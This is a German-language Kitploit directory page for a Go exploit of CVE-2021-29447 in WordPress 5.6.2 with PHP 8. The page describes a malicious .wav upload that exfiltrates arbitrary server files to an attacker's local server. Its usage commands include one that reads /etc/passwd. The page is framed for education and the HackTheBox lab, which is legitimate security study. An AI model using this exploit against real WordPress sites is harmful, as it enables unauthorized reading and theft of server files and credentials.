Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit_cve-2021-29447 — Go-basierter Exploit für CVE-2021-29447, der WordPress 5.6.2 mit PHP 8 angreift. Erzeugt eine schädliche .wav-Nutzlast, um beliebige Dateien vom Server über den Media-Upload abzurufen, wobei ein Basis-wp-admin-Zugriff erforderlich ist. | Kitploit
Tools/GitHubGitHub/mega8bit/exploit_cve-2021-29447
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

Go-basierter Exploit für CVE-2021-29447, der WordPress 5.6.2 mit PHP 8 angreift. Erzeugt eine schädliche .wav-Nutzlast, um beliebige Dateien vom Server über den Media-Upload abzurufen, wobei ein Basis-wp-admin-Zugriff erforderlich ist.

Repository anzeigen
71vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

exploit_cve-2021-29447

Nur zu Bildungszwecken.

Dieser Exploit ist als praktisches Tool gedacht, um jede beliebige Datei von einem Server zu erhalten, der WordPress 5.6.2 und PHP 8 ausführt (siehe https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5).

Du benötigst lediglich Basis-WP-Admin-Zugriff und die Möglichkeit, eine Mediendatei hochzuladen.

Der Exploit generiert eine .wav-Datei als Payload, die über wp-admin hochgeladen wird.

Anschließend nutzt der Exploit den eigenen Back-Server, um dir die gewünschte Datei direkt in der Konsole auszuliefern.

Die perfekte Anwendung ist die HackTheBox-Maschine - metatwo https://www.hackthebox.com/machines/metatwo

til

Verwendung/Beispiele

root@kitploit:~
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

Tool herunterladen